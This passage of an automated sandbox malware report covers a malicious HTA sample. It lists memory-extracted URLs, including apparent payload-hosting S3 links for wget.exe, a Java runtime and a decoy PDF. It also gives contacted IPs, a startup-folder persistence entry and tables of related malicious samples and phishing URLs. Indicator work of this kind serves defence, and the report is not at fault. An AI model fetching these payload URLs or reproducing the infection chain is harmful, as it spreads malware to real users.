https://ocsp.quovadisoffshore.com0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdfGI	mshta.exe, 00000000.00000003.2218374707.0000000002921000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2226635939.0000000002924000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2222533499.0000000002923000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.swisssign.com/	javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.chambersign.org	javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://policy.camerfirma.com0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.certigna.fr/certignarootca.crl	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl	javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216370998.00000000078C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2244222939.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217974859.00000000078AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false		high
https://buskwet.s3.eu-west-1.amazonaws.com	javaw.exe, 00000010.00000002.3197189783.000000000514F000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://java.oracle.com/java.vendor.url.bughttp://bugreport.sun.com/bugreport/%d.%djava.class.version	javaw.exe, 00000010.00000002.3209774475.000000006FD16000.00000002.00000001.01000000.00000012.sdmp, javaw.exe, 00000013.00000002.3226266590.000000006FD16000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exeft	mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2247270938.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwww.certigna.fr/autorites/0m	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://bugreport.sun.com/bugreport/	javaw.exe, 00000013.00000002.3219812687.0000000005136000.00000004.00001000.00020000.00000000.sdmp	false		high
http://java.oracle.com/	javaw.exe, javaw.exe, 00000010.00000002.3202598403.000000000A564000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3209774475.000000006FD16000.00000002.00000001.01000000.00000012.sdmp, javaw.exe, 00000013.00000002.3226266590.000000006FD16000.00000002.00000001.01000000.00000012.sdmp, javaw.exe, 00000013.00000002.3219812687.0000000005136000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000013.00000002.3220800767.000000000A5CD000.00000004.00001000.00020000.00000000.sdmp	false		high
http://null.oracle.com/	javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207044838.0000000015AE0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipORSC)	wget.exe, 0000000B.00000002.3048295545.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://branchlock.net/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y	unzip.exe	false	Avira URL Cloud: safe	unknown
https://wwww.certigna.fr/autorites/	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.metalinker.org/	mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://branchlock.net	javaw.exe, 00000010.00000003.3164511187.0000000001314000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000013.00000002.3222106413.000000001573A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/wget.exeItM	mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.swisssign.com/s	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipFilesC)	wget.exe, 0000000B.00000002.3048295545.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.swisssign.com/3x	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadisglobal.com/cps	javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html	javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip.s3	wget.exe, 0000000B.00000002.3048295545.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216370998.00000000078C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.quovadis.bm#	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwww.certigna.fr/autorites/k	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/swiftcopy.pdf$Z	mshta.exe, 00000000.00000002.2246043177.0000000002925000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/STCA.crl	javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zip	wget.exe, 0000000B.00000003.3047154819.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.8.zipN)	wget.exe, 0000000B.00000002.3048295545.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oracle.com/hotspot/jvm/vm/gc/id	javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216370998.00000000078C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216468413.00000000078AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
https://seasonmonster.s3.us-east-1.amazonaws.com/jre-1.	mshta.exe, 00000000.00000002.2247223645.000000000781C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oracle.com/technetwork/java/javaseproducts/printRegionInfo(I)VgetHeapUsageForContext(I)Jg	javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	false		high
https://gnu.org/licenses/	wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://crl.certigna.fr/certignarootca.crl01	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.gnu.org/licenses/gpl.html	mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	false		high
https://gnu.org/licenses/gpl.html	wget.exe, 0000000B.00000002.3047917243.0000000000BD5000.00000002.00000001.01000000.0000000B.sdmp	false		high
http://netpreserve.org/warc/1.0/revisit/identical-payload-digest	mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.oracle.com/technetwork/java/javaseproducts/	javaw.exe, javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crlKP	javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.oracle.com/hotspot/jvm/	javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.info-zip.org/UnZip.htmlDVarFileInfo$	mshta.exe, 00000000.00000002.2247961132.000000000DB4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217308169.000000000C92C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216211143.000000000DA21000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217394546.000000000DB6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217427897.00000000029BE000.00000004.00000020.00020000.00000000.sdmp, unzip.exe, 0000000F.00000000.3048897634.000000000043A000.00000008.00000001.01000000.0000000C.sdmp, unzip.exe, 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
https://branchlock.netb	javaw.exe, 00000013.00000002.3222106413.000000001573A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.chambersign.org/chambersroot.crl	javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id	javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.113.194.132	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.216.222.178	unknown	United States	16509	AMAZON-02US	false
3.5.71.63	unknown	United States	14618	AMAZON-AESUS	false
52.216.45.10	unknown	United States	16509	AMAZON-02US	false
23.56.162.204	unknown	United States	16625	AKAMAI-ASUS	false
23.219.161.132	unknown	United States	20940	AKAMAI-ASN1EU	false
52.22.41.97	unknown	United States	14618	AMAZON-AESUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
23.209.209.135	unknown	United States	23693	TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	false
52.6.155.20	unknown	United States	14618	AMAZON-AESUS	false
199.232.210.172	unknown	United States	54113	FASTLYUS	false
52.109.76.240	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.56.252.213	unknown	United States	42961	GPRS-ASZAINKW	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585904
Start date and time:	2025-01-08 13:53:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	malw.hta
Detection:	MAL
Classification:	mal100.spyw.evad.winHTA@65/379@0/13
EGA Information:	Successful, ratio: 60%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Execution Graph export aborted for target mshta.exe, PID 6252 because there are no executed function
Execution Graph export aborted for target wget.exe, PID 7896 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
07:54:27	API Interceptor	4x Sleep call for process: mshta.exe modified
07:54:37	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
07:56:18	API Interceptor	1x Sleep call for process: WMIC.exe modified
13:56:27	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
52.113.194.132	7ccf88c0bbe3b29bf19d877c4596a8d4.zip	Get hash	malicious	Unknown	Browse
	Quarantined Messages(3).zip	Get hash	malicious	HTMLPhisher	Browse
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse
	DownloadedMessage.zip	Get hash	malicious	HTMLPhisher	Browse
	FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg	Get hash	malicious	Unknown	Browse
	phish_alert_iocp_v1.4.48 - 2024-12-27T140703.193.eml	Get hash	malicious	Unknown	Browse
	phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.eml	Get hash	malicious	Unknown	Browse
	phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.eml	Get hash	malicious	Unknown	Browse
	Google Authenticator You're trying to sign in from a new location.msg	Get hash	malicious	Unknown	Browse
	[External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.eml	Get hash	malicious	Unknown	Browse
52.216.45.10	https://www.1sale.com	Get hash	malicious	Unknown	Browse
23.56.162.204	06012025_1416_bombastic.hta	Get hash	malicious	Branchlock Obfuscator	Browse
	Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.eml	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse
	Scan_03774843.pdf	Get hash	malicious	Unknown	Browse
	Rappel de paiement.pdf	Get hash	malicious	Unknown	Browse
	https://www.wixsite.com/_api/invoice/2d5e7023-6014-4f5e-ab31-c1e25d999b96:9b27124a-a130-45dc-b81f-e5675b538826/view?token=56c18155-b636-4505-b95c-630f3d19901a	Get hash	malicious	HTMLPhisher	Browse
	lCc7eClats.pdf	Get hash	malicious	Unknown	Browse
	wX7zgpJHJS.pdf	Get hash	malicious	Unknown	Browse
	http://cdn.prod.website-files.com/65dccdc21b806b929439370e/66e00f5491860971b9b9ef25_80703488528.pdf	Get hash	malicious	Unknown	Browse
23.219.161.132	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse
	aD7D9fkpII.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	atomxml.ps1	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.48
	06012025_1416_bombastic.hta	Get hash	malicious	Branchlock Obfuscator	Browse	52.216.220.130
	http://www.hillviewlodge.hotelrent.top	Get hash	malicious	Unknown	Browse	18.245.31.129
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	52.222.232.30
	https://wetransfert-devis-factgfd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	18.245.60.5
	mail (4).eml	Get hash	malicious	Unknown	Browse	52.29.116.175
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.50
	https://www.dollartip.info/neuro	Get hash	malicious	Unknown	Browse	3.167.227.123
	https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdk	Get hash	malicious	Unknown	Browse	13.32.121.31
AMAZON-AESUS	06012025_1416_bombastic.hta	Get hash	malicious	Branchlock Obfuscator	Browse	3.5.68.175
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	34.239.8.63
	mail (4).eml	Get hash	malicious	Unknown	Browse	3.89.18.81
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	3.5.12.103
	https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdk	Get hash	malicious	Unknown	Browse	54.145.131.117
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=evsqlwgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#test@kghm.com	Get hash	malicious	Unknown	Browse	3.233.162.86
	http://plnbl.io/review/VdCYQSoKp54z	Get hash	malicious	HTMLPhisher	Browse	3.223.63.250
	https://juddshaw.acemlnc.com/lt.php?x=3DZy~GDHJXeaEpz5-g1FVxNz1qEjv_Qij~tijXnLI3Ke75_7z0y.yuJz5X6lmNI~jusw	Get hash	malicious	HTMLPhisher	Browse	54.225.69.136
	miori.ppc.elf	Get hash	malicious	Unknown	Browse	54.136.13.236
AMAZON-02US	atomxml.ps1	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.48
	06012025_1416_bombastic.hta	Get hash	malicious	Branchlock Obfuscator	Browse	52.216.220.130
	http://www.hillviewlodge.hotelrent.top	Get hash	malicious	Unknown	Browse	18.245.31.129
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	52.222.232.30
	https://wetransfert-devis-factgfd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	18.245.60.5
	mail (4).eml	Get hash	malicious	Unknown	Browse	52.29.116.175
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.50
	https://www.dollartip.info/neuro	Get hash	malicious	Unknown	Browse	3.167.227.123
	https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdk	Get hash	malicious	Unknown	Browse	13.32.121.31
MICROSOFT-CORP-MSN-AS-BLOCKUS	mail (4).eml	Get hash	malicious	Unknown	Browse	104.47.11.92
	Subscription_Renewal_Invoice_2025_HKVXTC.html	Get hash	malicious	HTMLPhisher	Browse	40.99.150.82
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	13.107.5.80
